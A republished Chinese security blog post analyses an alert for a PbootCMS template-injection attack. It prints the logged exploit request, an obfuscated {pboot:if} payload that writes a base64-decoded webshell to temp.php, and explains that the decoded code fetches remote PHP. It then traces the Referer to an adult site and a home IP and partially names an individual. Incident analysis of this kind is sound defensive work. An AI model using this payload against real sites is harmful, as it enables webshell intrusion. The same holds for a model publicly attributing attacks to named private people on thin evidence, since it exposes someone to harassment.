文章总结： 本文记录了一起PbootCMS模板注入告警的溯源。攻击者利用{pboot:if}标签植入Webshell。作者追踪Referer至江苏某IP的WordPress站点，最终关联到购买特定网站主题的个人徐某。这是一次结合WEB漏洞分析与娱乐八卦的吃瓜事件。 综合评分： 58 文章分类： 娱乐吃瓜,WEB安全,漏洞POC

【吃瓜】从告警中收获大量片片

原创

若尘 若尘

表哥带我

2025年7月26日 14:38 柬埔寨

免责声明

由于传播、利用本公众号”表哥带我”所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号”表哥带我”及供稿作者不为此承担任何责任,一旦造成后果请自行承担!

在这个阳光明媚的清晨，看见一条告警

PbootCMS 模板注入

{pboot:if}是PbootCMS的条件判断标签，攻击者利用模板引擎漏洞执行任意PHP代码

可能某个黑客路过尝试一下

GET /{pboot:if((\"file_put_co\".\"ntents\")(\"temp.php\",(\"base6\".\"4_decode\")(\"删掉了")))}{/pboot:if}/../../?p=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

Referer: http://n.....com

#

| 关键字段 | 内容分析 | 攻击风险评估 | | — | — | — | | 请求路径 | /{pboot:if((\"file_put_co\".\"ntents\")(\"temp.php\",...))}{/pboot:if}/../../?p=1 | 包含PbootCMS模板标签{pboot:if}，内嵌 PHP 代码执行文件操作 | | 执行动作 | file_put_contents("temp.php", base64_decode("...")) | 将 Base64 解码后的恶意代码写入 temp.php 文件（Webshell 植入） | | Base64 解码内容 | 创建并执行远程 PHP 文件，最终删除自身（典型 Webshell 行为） | | | 请求频率 | 5 分钟内 18 次请求 | 可能在尝试绕过防护机制或验证漏洞利用效果 | | 来源特征 | User-Agent为正常浏览器，但Referer指向片片网站 | 利用片片网站作为攻击跳板，隐藏真实来源 |

#

删掉的地址指向一个txt,有人提交过了

看看txt的内容，没有什么有用的东西

黑客的服务器就开了两个端口

算了，看看Referer发现指向难以描述的网站

前往下载APP的地址

指向江苏住宅IP

是江苏的精神小伙吗

访问端口首页看见是Wordpress初始页面

尝试一下

虽然群友都很想看看500购买的网站主题长什么样

但是还是忍不住说一句👇

徐X崎 很抱歉以这种方式认识你

提醒:本文源于互联网投稿如有雷同纯属巧合

往期推荐

【薅羊毛】某云1元薅384核1152GB-DeepSeek-R1-671B满血版算力服务器

【喜报】娱乐圈百强出炉，黑客排行榜已收录一百名大牛

【吃瓜】某校官网惊现PHP大马，蠢蛋路人复刻

扫码关注我们

微信公众号：表哥带我

本文供稿：若尘

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：表哥带我 《【吃瓜】从告警中收获大量片片》